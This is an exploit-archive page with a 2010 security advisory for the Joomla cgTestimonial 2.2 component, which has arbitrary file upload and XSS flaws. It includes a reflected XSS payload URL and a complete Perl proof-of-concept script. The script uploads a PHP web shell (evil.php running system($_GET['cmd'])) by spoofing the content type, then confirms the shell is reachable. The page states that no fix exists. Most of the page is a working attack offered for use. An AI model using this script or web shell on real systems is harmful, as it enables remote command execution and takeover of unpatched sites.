Home / os / win7

Joomla Component cgTestimonial 2.2 Multiple Remote Vulnerabi

Posted on 06 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component cgTestimonial 2.2 Multiple Remote Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================================
Joomla Component cgTestimonial 2.2 Multiple Remote Vulnerabilities
==================================================================


cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities
 
 Name              cgTestimonial
 Vendor            http://www.cmsgalaxy.com
 Versions Affected 2.2
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-06
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
________________________
 
cg_Testimonial   component   is   a  tool   for   adding
testimonial  by  the user from frontend and managing and
publishing testimonials from backend.
This  Joomla  extension  allows website user to submit a
testimonials  form  with  several  fields on one of your
site's  page  and enable  adding  testimonials by either
users or admin.
 
 
II. DESCRIPTION
_______________
 
Some parameters are not properly sanitised.The following
vulnerabilities can be exploited from guest users.
 
 
III. ANALYSIS
_____________
 
Summary:
 
 A) Multiple Arbitrary File Upload
 B) XSS
  
 
A) Multiple Arbitrary File Upload
_________________________________
 
The  usr_img  parameter  in cgtestimonial.php (frontend)
and in testimonial.php  (admin, without checks)  is  not
properly sanitised. A check  is executed on the content-
type HTTP field.
 
 
B) XSS
______
 
The url parameter in video.php is not properly sanitised
before being printed on screen.
 
 
IV. SAMPLE CODE
_______________
 
A) Multiple Arbitrary File Upload
 
http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt
 
B) XSS
 
http://site/path/components/com_cgtestimonial/video.php?url=&quot;&gt;&lt;script&gt;alert('xss');&lt;/script&gt;
 
 
V. FIX
______
 
No fix.
 
################################ PoC-cgTestimonial2.2.pl ################################
 
#!/usr/bin/perl
#
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
#
# Author: Salvatore Fresta aka Drosophila
# Email:  salvatorefresta@gmail.com
#
# Date: 06 August 2010
#
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command
#
 
use IO::Socket;
 
 
$usage = &quot;
cgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta
&quot;.
         &quot;http://www.salvatorefresta.net

&quot;.
         &quot;Usage: perl PoC-cgTestimonial.pl &lt;hostname&gt; &lt;path&gt;

&quot;;
 
$#ARGV == 1 || die $usage;
 
my $host      = $ARGV[0];
my $path      = $ARGV[1];
 
my $stop      = 0;
my $rand      = &quot;master&quot;.int(rand 150);
my $shell     = &quot;&lt;?php echo &quot;&lt;pre&gt;&quot;; system($_GET['cmd']); echo &quot;&lt;/pre&gt;&quot;; ?&gt;&quot;;
my $filename  = &quot;evil.php&quot;;
 
my $code      = &quot;--AaB03x
&quot;.
                &quot;Content-Disposition: form-data; name=&quot;usr_img&quot;; filename=&quot;$filename&quot;
&quot;.
                &quot;Content-Type: image/jpeg
&quot;.
                &quot;
&quot;.
                &quot;$shell
&quot;.
                &quot;--AaB03x--&quot;;
 
my $pkg       = &quot;POST &quot;.$path.&quot;index.php?option=com_cgtestimonial&amp;task=submit HTTP/1.1
&quot;.
                &quot;Host: $host
&quot;.
                &quot;Content-Type: multipart/form-data; boundary=AaB03x
&quot;.
                &quot;Content-Length: &quot; .length($code). &quot;
&quot;.
                &quot;
&quot;.
                $code;
 
my $socket = new IO::Socket::INET( Proto=&gt; &quot;tcp&quot;,
                                   PeerAddr=&gt; $host,
                                   PeerPort=&gt; &quot;80&quot;
                                  ) or die &quot;
[-] Unable to connect to $host

&quot;;
 
print &quot;
[+] Connected
&quot;;
print $socket $pkg;
 
$pkg = &quot;GET &quot;.$path.&quot;components/com_cgtestimonial/user_images/&quot;.$filename.&quot; HTTP/1.1
&quot;.
       &quot;Host: $host

&quot;;
 
print $socket $pkg;
 
while ((my $rec = &lt;$socket&gt;) &amp;&amp; $stop != 1) {
  if($rec !=~ /302 Found/) {
    $stop = 1;
  }
}
 
if($stop != 1) {
  print &quot;[-] Shell not uploaded
&quot;;
  close($socket);
  exit;
}
 
print &quot;[+] Shell uploaded on &quot;.$host.$path.&quot;components/com_cgtestimonial/user_images/&quot;.$filename.&quot;
&quot;.
      &quot;[+] Disconnected

&quot;;
 
close($socket);


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :